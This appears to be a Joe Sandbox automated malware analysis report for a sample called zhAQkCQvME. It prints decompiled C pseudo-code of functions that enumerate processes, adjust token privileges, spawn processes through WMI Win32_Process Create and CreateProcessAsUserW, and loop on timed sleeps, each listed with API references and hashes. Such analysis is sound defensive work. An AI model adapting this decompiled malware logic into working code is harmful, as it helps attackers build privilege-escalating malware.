						_t26 = 0;
						if(0 == 0) {
							break;
						}
					}
					_t25 = E004107D0(0, _a4, 0x14);
					_t30 = _t30 + 8;
					_v8 = _t25;
				}
				if(_v8 <= 0) {
					while(0 != 0) {
					}
					_t21 = E004041B0(_t26, _a4, 0, 0x9c40, 1); // executed
					if(_t21 == 0) {
						_v24 = GetLastError();
						while(0 != 0) {
						}
						_v20 = 0;
					} else {
						_v20 = 1;
					}
				}
				return _v20;
			}

0x0040eb06
0x0040eb0d
0x0040eb14
0x0040eb20
0x0040eb23
0x0040eb27
0x0040eb2d
0x0040eb4c
0x0040eb4e
0x0040eb52
0x0040eb54
0x0040eb58
0x0040eb5d
0x0040eb60
0x0040eb60
0x0040eb2f
0x0040eb2f
0x0040eb2f
0x0040eb31
0x00000000
0x00000000
0x0040eb33
0x0040eb3b
0x0040eb40
0x0040eb43
0x0040eb43
0x0040eb67
0x0040eb69
0x0040eb6d
0x0040eb7c
0x0040eb86
0x0040eb97
0x0040eb9a
0x0040eb9e
0x0040eba0
0x0040eb88
0x0040eb88
0x0040eb88
0x0040eb86
0x0040ebad

APIs

GetLastError.KERNEL32 ref: 0040EB91

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0477d14546f3774c8a3c6ba8dd037064c8c7b3c809d662651f6f5777922c7132
Instruction ID: ff0656d46a1c963d42db67b1826eff94b12d1a1277ade3e4ad05a8bc086b5c0a
Opcode Fuzzy Hash: 0477d14546f3774c8a3c6ba8dd037064c8c7b3c809d662651f6f5777922c7132
Instruction Fuzzy Hash: 571193B4D00209D6DF14DFA288157AF77B0AB40304F14897BE513762C1D67DAA61DB9A

Uniqueness

Uniqueness Score: 0.02%

Function 00409410, Relevance: 1.3, APIs: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409410(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t11;
				int _t12;
				void* _t18;
				signed int _t19;
				void* _t20;
				void* _t21;

				_v8 = 0;
				if( *0x41f700 != 0) {
					_v8 = 0;
					while(_v8 < 0x100) {
						_t19 = _v8;
						_t20 =  *0x41f700; // 0x1b20048
						_t8 = _t19 * 8; // 0x1b2004a
						E00403F10(_t20 + _t8 + 2, 0);
						_t21 = _t21 + 8;
						_v8 = _v8 + 1;
					}
					_t11 = E00403F10(0x41f700, 0); // executed
				}
				if(_a4 != 0 &&  *0x421704 != 0) {
					_t18 =  *0x421704; // 0x13c
					_t12 = CloseHandle(_t18);
					 *0x421704 = 0;
					return _t12;
				}
				return _t11;
			}

0x00409414
0x00409422
0x00409424
0x00409436
0x00409441
0x00409444
0x0040944a
0x0040944f
0x00409454
0x00409433
0x00409433
0x00409460
0x00409465
0x0040946c
0x00409477
0x0040947e
0x00409484
0x00000000
0x00409484
0x00409491

APIs

CloseHandle.KERNEL32(0000013C), ref: 0040947E

Part of subcall function 00403F10: lstrlenA.KERNEL32(00407F26,?,0040817E,00407D67,000000FF), ref: 00403F27
Part of subcall function 00403F10: HeapFree.KERNEL32(015D0000,00000000,00000000), ref: 00403F6A

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseFreeHandleHeaplstrlen
String ID:
API String ID: 666089146-0
Opcode ID: 31f10a9aee75fb63b24237f914fcf7bf31c346ea80220e3ea9272fd05e1fd209
Instruction ID: 817c258270a786ed10a2a986ed3806db141f2cbfda497024a602e24cff9bf052
Opcode Fuzzy Hash: 31f10a9aee75fb63b24237f914fcf7bf31c346ea80220e3ea9272fd05e1fd209
Instruction Fuzzy Hash: E101D670A08304EBD720DFD0E90979A3374FB40309F50807AD905273D1C3785E86CB49

Uniqueness

Uniqueness Score: 0.03%

Function 0040EDF0, Relevance: 1.3, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040EDF0() {
				void* _t1;
				int _t2;

				_t1 =  *0x41f704; // 0x0
				_t2 = CloseHandle(_t1); // executed
				if(_t2 != 0) {
					 *0x41f704 = 0;
					return _t2;
				}
				while(0 != 0) {
				}
				return _t2;
			}

0x0040edf3
0x0040edf9
0x0040ee01
0x0040ee0b
0x00000000
0x0040ee0b
0x0040ee03
0x0040ee07
0x00000000

APIs

CloseHandle.KERNELBASE(00000000), ref: 0040EDF9

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5435465b1be0a469f92eca0fbae4c8ed658058f887ca88e123cb079007ed47fb
Instruction ID: 35270ea037358edb1c10bbe79f5655c19b78ff10fb493c578b7c3382ec902663
Opcode Fuzzy Hash: 5435465b1be0a469f92eca0fbae4c8ed658058f887ca88e123cb079007ed47fb
Instruction Fuzzy Hash: 01D0123420430CC6CA204FE7EC0C766779CBB84704F108837D51697AD1D63994A646DE

Uniqueness

Uniqueness Score: 0.03%

Non-executed Functions

Function 00410920, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 188comCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 00410945
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0041096C
CoCreateInstance.OLE32(0041C4D8,00000000,00000001,0041C408,00000000), ref: 00410993
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00410A04

Strings

Win32_Process, xrefs: 00410A4B, 00410B03
ROOT\CIMV2, xrefs: 004109C4
Create, xrefs: 00410A7E, 00410AFE
CommandLine, xrefs: 00410ADA

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Initialize$BlanketCreateInstanceProxySecurity
String ID: CommandLine$Create$ROOT\CIMV2$Win32_Process
API String ID: 1719769963-1237754972
Opcode ID: aa83e53da423ff0c2634ec6b5450076b34003e7587d000e44507019657c726c7
Instruction ID: 81d91430a939b221dd92f2b0f898ccdb926b6ea7bcdc5bef7e176c3dd6a35d2d
Opcode Fuzzy Hash: aa83e53da423ff0c2634ec6b5450076b34003e7587d000e44507019657c726c7
Instruction Fuzzy Hash: 49612974A54309EFEB10CB95CC55BEEB7B0AB58714F20819AE111AB2D0C7F86AC1CF59

Uniqueness

Uniqueness Score: 2.20%

Function 0040AE50, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83
processUNIQUE

Download Yara Rule

C-Code - Quality: 72%

			E0040AE50() {
				char _v264;
				void* _v300;
				void* _v304;
				int _v308;
				intOrPtr _v312;
				signed int _v316;
				char _v320;
				char _t41;
				void* _t42;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t58;

				_v308 = 0;
				_v304 = 0xffffffff;
				_v312 = 0x22ea;
				while(0 != 0) {
				}
				_v304 = CreateToolhelp32Snapshot(2, GetCurrentProcessId());
				if(_v304 != 0xffffffff) {
					_t46 =  &_v300;
					memset( &_v300, 0, 0x128);
					_t57 = _t56 + 0xc;
					_v300 = 0x128;
					if(Process32First(_v304,  &_v300) != 0) {
						do {
							_v316 = 0;
							while(_v316 < 1) {
								_t41 = E00408060(_t46,  *((intOrPtr*)(_t55 + _v316 * 4 - 0x134)));
								_t57 = _t57 + 4;
								_v320 = _t41;
								if(_v320 == 0) {
									L14:
									_t46 = _v316 + 1;
									_v316 = _v316 + 1;
									continue;
								} else {
									_t42 = E00403DE0( &_v264, _v320);
									_t58 = _t57 + 8;
									if(_t42 != 0) {
										E00408170( &_v320);
										_t57 = _t58 + 4;
										goto L14;
									} else {
										while(0 != 0) {
										}
										_v308 = 1;
										E00408170( &_v320);
										_t57 = _t58 + 4;
									}
								}
								break;
							}
							if(_v308 == 0) {
								goto L16;
							}
							break;
							L16:
							_t46 = _v304;
						} while (Process32Next(_v304,  &_v300) != 0);
						CloseHandle(_v304);
					}
				}
				return _v308;
			}

0x0040ae59
0x0040ae63
0x0040ae6d
0x0040ae77
0x0040ae7b
0x0040ae8c
0x0040ae99
0x0040aea6
0x0040aead
0x0040aeb2
0x0040aeb5
0x0040aed5
0x0040aedb
0x0040aedb
0x0040aef6
0x0040af0d
0x0040af12
0x0040af15
0x0040af22
0x0040af6e
0x0040aeed
0x0040aef0
0x00000000
0x0040af24
0x0040af32
0x0040af37
0x0040af3c
0x0040af66
0x0040af6b
0x00000000
0x0040af3e
0x0040af3e
0x0040af42
0x0040af44
0x0040af55
0x0040af5a
0x0040af5a
0x0040af3c
0x00000000
0x0040af22
0x0040af7a
0x00000000
0x00000000
0x00000000
0x0040af7c
0x0040af83
0x0040af90
0x0040af9f
0x0040af9f
0x0040aed5
0x0040afae

APIs

GetCurrentProcessId.KERNEL32 ref: 0040AE7D
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040AE86
memset.MSVCRT ref: 0040AEAD
Process32First.KERNEL32(000000FF,00000128), ref: 0040AECD
Process32Next.KERNEL32(000000FF,00000128), ref: 0040AF8A
CloseHandle.KERNEL32(000000FF), ref: 0040AF9F

Strings

", xrefs: 0040AE6D

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32memset
String ID: "
API String ID: 2672634495-3847333454
Opcode ID: dfa2102e71a9019eb450a3b798e13c566c3a9016b0583f048b719fc1e8113e95
Instruction ID: a2306d3643e79b31d4cf8ba6fbc3c8455656fc0a3a7ba85baee8b2a2d618582b
Opcode Fuzzy Hash: dfa2102e71a9019eb450a3b798e13c566c3a9016b0583f048b719fc1e8113e95
Instruction Fuzzy Hash: DD314FB19003189BDB30DF60DC84BDEB774AB19314F0045EAE549762C0EB789BA5CF9A

Uniqueness

Uniqueness Score: 100.00%

Function 00402690, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 207
sleepUNIQUECrypto

Download Yara Rule

C-Code - Quality: 59%

			E00402690(void* __fp0) {
				char _v8;
				struct HINSTANCE__* _v12;
				char _v16;
				char _v20;
				struct HINSTANCE__* _v24;
				char _v28;
				struct HINSTANCE__* _v32;
				struct HINSTANCE__* _v36;
				CHAR* _v40;
				char _v108;
				struct HINSTANCE__* _v112;
				char _t52;
				struct HINSTANCE__* _t54;
				intOrPtr _t56;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t59;
				struct HINSTANCE__* _t60;
				CHAR* _t61;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t70;
				struct HINSTANCE__* _t76;
				struct HINSTANCE__* _t78;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t116;

				_t116 = __fp0;
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				while(0 != 0) {
				}
				 *0x41f6d4 = 0;
				_t52 = E004084C0( *((intOrPtr*)(0x4217b0 + E00408A50(0, _t116, 0x4201bc, 0x64, 0x1f4) *  *0x41ffac * 4)),  &_v8,  &_v20);
				_t104 = _t102 + 0x18;
				_v16 = _t52;
				if(_v16 != 0) {
					_t54 = E004060C0(_v16, _v8, 0);
					_t105 = _t104 + 0xc;
					_v12 = _t54;
					__eflags = _v12;
					if(_v12 != 0) {
						_v32 = 0;
						_v28 = 0;
						E00408C60();
						_t56 =  *0x42187c; // 0x15d0d91
						_t85 = _v12;
						_t57 = E00408290(_t116, _v12, _t56,  &_v28, 0, 0, 0);
						_t106 = _t105 + 0x18;
						_v32 = _t57;
						__eflags = _v32;
						if(_v32 == 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							L17:
							_t59 = E004093B0(_t85, 0, "zhAQkCQvME");
							_t107 = _t106 + 8;
							__eflags = _t59;
							if(_t59 != 0) {
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								L23:
								_v36 = 0;
								_t60 = E00408FF0(_t85, __eflags, 0x29);
								_t108 = _t107 + 4;
								_v36 = _t60;
								__eflags = _v36;
								if(__eflags == 0) {
									_t61 = E00408060(_t85, 0x5c4);
									_t109 = _t108 + 4;
									_v40 = _t61;
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									__eflags = _v40;
									if(_v40 == 0) {
										L36:
										E00403F10( &_v16, _v8);
										_t110 = _t109 + 8;
										__eflags = _v12;
										if(__eflags != 0) {
											_t85 =  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v12 + 0x3c)) + 0x50));
											E00403F10( &_v12,  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v12 + 0x3c)) + 0x50)));
											_t110 = _t110 + 8;
										}
										E00402920(_t85, __eflags);
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										__eflags = _v24;
										if(__eflags != 0) {
											do {
												Sleep(0x7d0);
												__eflags =  *0x41f6d0;
											} while ( *0x41f6d0 == 0);
											while(1) {
												L57:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											__eflags = 0;
											return 0;
										} else {
											goto L42;
										}
										while(1) {
											L42:
											_t67 = E00408FF0(_t85, __eflags, 0x31);
											_t110 = _t110 + 4;
											_v112 = _t67;
											__eflags = _v112;
											if(_v112 != 0) {
												goto L43;
											}
											Sleep(0x7d0);
											__eflags =  *0x41f6d0;
											if(__eflags == 0) {
												continue;
											}
											L47:
											__eflags =  *0x41f6d0;
											if( *0x41f6d0 == 0) {
												E00401FF0(_t116,  &_v108);
												_t111 = _t110 + 4;
												while(1) {
													_t70 = E00401DC0(_t85,  &_v108);
													_t111 = _t111 + 4;
													__eflags = _t70;
													if(_t70 < 0) {
														goto L51;
													}
													Sleep(0x3e8);
													__eflags =  *0x41f6d0;
													if( *0x41f6d0 == 0) {
														continue;
													}
													E004018C0();
													Sleep(0x7d0);
													goto L57;
												}
												while(1) {
													L51:
													__eflags = 0;
													if(0 == 0) {
														break;
													}
												}
												return 1;
											}
											goto L57;
										}
										while(1) {
											L43:
											_t85 = 0;
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										goto L47;
									}
									_t76 = GetModuleHandleA(_v40);
									__eflags = _t76;
									if(_t76 == 0) {
										goto L36;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t85 = 0;
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_v24 = 1;
									goto L36;
								}
								_t78 = E00403CF0(__eflags, _v36);
								_t109 = _t108 + 4;
								_v24 = _t78;
								while(1) {
									_t85 = 0;
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								goto L36;
							} else {
								goto L18;
							}
							while(1) {
								L18:
								_t85 = 0;
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							goto L23;
						} else {
							goto L12;
						}
						while(1) {
							L12:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t85 = _v32;
						E00409230(_v32, _v32, _v28, 0, 1);
						E00403F10( &_v32, 0);
						_t106 = _t106 + 0x18;
						goto L17;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x00402690
0x00402696
0x0040269d
0x004026a4
0x004026ab
0x004026b2
0x004026b9
0x004026bd
0x004026bf
0x004026f4
0x004026f9
0x004026fc
0x00402703
0x0040271c
0x00402721
0x00402724
0x00402727
0x0040272b
0x0040273a
0x00402741
0x00402748
0x00402757
0x0040275d
0x00402761
0x00402766
0x00402769
0x0040276c
0x00402770
0x0040279c
0x0040279c
0x0040279e
0x00000000
0x00000000
0x004027a0
0x004027a2
0x004027a9
0x004027ae
0x004027b1
0x004027b3
0x004027bd
0x004027bd
0x004027bf
0x00000000
0x00000000
0x004027c1
0x004027c3
0x004027c3
0x004027cc
0x004027d1
0x004027d4
0x004027d7
0x004027db
0x004027f9
0x004027fe
0x00402801
0x00402804
0x00402804
0x00402806
0x00000000
0x00000000
0x00402808
0x0040280a
0x0040280e
0x0040282b
0x00402833
0x00402838
0x0040283b
0x0040283f
0x0040284a
0x00402853
0x00402858
0x00402858
0x0040285b
0x00402860
0x00402860
0x00402862
0x00000000
0x00000000
0x00402864
0x00402866
0x0040286a
0x004028f9
0x004028fe
0x00402904
0x00402904
0x0040290d
0x0040290d
0x0040290d
0x0040290f
0x00000000
0x00000000
0x00402911
0x00402913
0x00000000
0x00000000
0x00000000
0x00000000
0x00402870
0x00402870
0x00402872
0x00402877
0x0040287a
0x0040287d
0x00402881
0x00000000
0x00000000
0x00402890
0x00402896
0x0040289d
0x00000000
0x00000000
0x0040289f
0x0040289f
0x004028a6
0x004028ae
0x004028b3
0x004028b6
0x004028ba
0x004028bf
0x004028c2
0x004028c4
0x00000000
0x00000000
0x004028d8
0x004028de
0x004028e5
0x00000000
0x00000000
0x004028e7
0x004028f1
0x00000000
0x004028f1
0x004028c6
0x004028c6
0x004028c6
0x004028c8
0x00000000
0x00000000
0x004028ca
0x00000000
0x004028cc
0x00000000
0x004028a8
0x00402883
0x00402883
0x00402883
0x00402883
0x00402885
0x00000000
0x00000000
0x00402887
0x00000000
0x00402889
0x00402814
0x0040281a
0x0040281c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040281e
0x0040281e
0x0040281e
0x0040281e
0x00402820
0x00000000
0x00000000
0x00402822
0x00402824
0x00000000
0x00402824
0x004027e1
0x004027e6
0x004027e9
0x004027ec
0x004027ec
0x004027ec
0x004027ee
0x00000000
0x00000000
0x004027f0
0x00000000
0x00000000
0x00000000
0x00000000
0x004027b5
0x004027b5
0x004027b5
0x004027b5
0x004027b7
0x00000000
0x00000000
0x004027b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00402772
0x00402772
0x00402772
0x00402774
0x00000000
0x00000000
0x00402776
0x00402780
0x00402784
0x00402792
0x00402797
0x00000000
0x00000000
0x00000000
0x00000000
0x0040272d
0x0040272d
0x0040272d
0x0040272f
0x00000000
0x00000000
0x00402731
0x00000000
0x00402733
0x00402705
0x00402709
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00402814
Sleep.KERNEL32(000007D0), ref: 00402890
Sleep.KERNEL32(000003E8), ref: 004028D8
Sleep.KERNEL32(000007D0), ref: 004028F1
Sleep.KERNEL32(000007D0), ref: 004028FE

Strings

zhAQkCQvME, xrefs: 004027A2

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Sleep$HandleModule
String ID: zhAQkCQvME
API String ID: 3646095425-2550356889
Opcode ID: a81cc5b267d9c6570bda2011426794a4aeb33d70c306dc5f3d1b7b7d290425d4
Instruction ID: 53c61a8ddb0c1f2c2b45d1d11316b080553bf8ffda32d83973a42694e4957832
Opcode Fuzzy Hash: a81cc5b267d9c6570bda2011426794a4aeb33d70c306dc5f3d1b7b7d290425d4
Instruction Fuzzy Hash: 1171C4B9D00205DBDB14EBA1DA4DBAF7274AB44308F14813BE501762C1E7FC5A45CBAE

Uniqueness

Uniqueness Score: 100.00%

Function 00404400, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106processUNIQUE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0040443A
EqualSid.ADVAPI32(00000000,?), ref: 0040447A
memset.MSVCRT ref: 004044A4
CreateProcessAsUserW.ADVAPI32(00000000,00000000,0040EC10,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 004044F9
CloseHandle.KERNEL32(00000000), ref: 0040452A

Strings

D, xrefs: 004044C2

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseCreateEqualErrorHandleLastProcessUsermemset
String ID: D
API String ID: 764747229-2746444292
Opcode ID: 94a957f2dcce38e38516e2dd2e6f44e9465f9219e715d19aa7055005398e4b88
Instruction ID: 23f9b88b1fd112f6225a3c81fab27f670ed4ecc6b5754e6fd68f3255cb50f5d9
Opcode Fuzzy Hash: 94a957f2dcce38e38516e2dd2e6f44e9465f9219e715d19aa7055005398e4b88
Instruction Fuzzy Hash: 783172B4A04309ABDB20DFA0DC85BAF7774ABC4704F50453AE705BA2D0E6789A41CB5A

Uniqueness

Uniqueness Score: 23.02%

Function 00407340, Relevance: 9.1, APIs: 6, Instructions: 89
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E00407340(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				long _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				struct _LUID _v40;
				int _v44;
				intOrPtr _v48;
				struct _TOKEN_PRIVILEGES _v56;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0x10;
				_v12 = E00407230(__ecx, 0x28);
				if(_v12 == 0) {
					return 0xfffffff8;
				}
				if(LookupPrivilegeValueA(0, _a4,  &_v40) != 0) {
					_v56.PrivilegeCount = 1;
					_v56.Privileges = _v40.LowPart;
					_v48 = _v40.HighPart;
					if(_a8 == 0) {
						_v44 = 0;
					} else {
						_v44 = 2;
					}
					_v56.PrivilegeCount = 1;
					_v56.Privileges = _v40.LowPart;
					_v48 = _v40.HighPart;
					_v44 = 0;
					AdjustTokenPrivileges(_v12, 0,  &_v56, 0x10,  &_v32,  &_v8);
					if(GetLastError() == 0) {
						_v32.PrivilegeCount = 1;
						_v32.Privileges = _v40.LowPart;
						_v24 = _v40.HighPart;
						if(_a8 == 0) {
							_v20 = 0;
						} else {
							_v20 = 2;
						}
						AdjustTokenPrivileges(_v12, 0,  &_v32, _v8, 0, 0);
						if(GetLastError() != 0) {
							_v16 = 0xfffffff9;
						}
					} else {
						_v16 = 0xfffffffa;
					}
				} else {
					_v16 = 0xfffffffb;
				}
				if(_v12 != 0) {
					CloseHandle(_v12);
				}
				return _v16;
			}

0x00407346
0x0040734d
0x00407354
0x00407365
0x0040736c
0x00000000
0x0040736e
0x0040738a
0x00407398
0x004073a2
0x004073a8
0x004073af
0x004073ba
0x004073b1
0x004073b1
0x004073b1
0x004073c1
0x004073cb
0x004073d1
0x004073d4
0x004073ef
0x004073fd
0x00407408
0x00407412
0x00407418
0x0040741f
0x0040742a
0x00407421
0x00407421
0x00407421
0x00407443
0x00407451
0x00407453
0x00407453
0x004073ff
0x004073ff
0x004073ff
0x0040738c
0x0040738c
0x0040738c
0x0040745e
0x00407464
0x00407464
0x00000000

APIs

Part of subcall function 00407230: GetCurrentThread.KERNEL32(00407583,00000000,00000008,?,?,00407583,00000008), ref: 0040723E
Part of subcall function 00407230: OpenThreadToken.ADVAPI32(00000000,?,?,00407583,00000008), ref: 00407245
Part of subcall function 00407230: GetLastError.KERNEL32(?,?,00407583,00000008), ref: 0040724F
Part of subcall function 00407230: GetCurrentProcess.KERNEL32(00407583,00000008,?,?,00407583,00000008), ref: 00407264
Part of subcall function 00407230: OpenProcessToken.ADVAPI32(00000000,?,?,00407583,00000008), ref: 0040726B

LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 00407382
CloseHandle.KERNEL32(00000000), ref: 00407464

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken$CloseErrorHandleLastLookupPrivilegeValue
String ID:
API String ID: 3905888659-0
Opcode ID: af4d31649745777af93d1a31655b94320e509fe745af2840acd784c2f80f3303
Instruction ID: ae4b851ec796dba1a5ba91e3b677109176b20daa76867fb68cec0ae3935af939
Opcode Fuzzy Hash: af4d31649745777af93d1a31655b94320e509fe745af2840acd784c2f80f3303
Instruction Fuzzy Hash: 0E41D9B4E04208EBDB10CF94D858BDEBBB4FB48314F20826AE915772D0D7796A45CF56

Uniqueness

Uniqueness Score: 100.00%

Function 0041280F, Relevance: 8.1, Strings: 6, Instructions: 577
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E0041280F(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
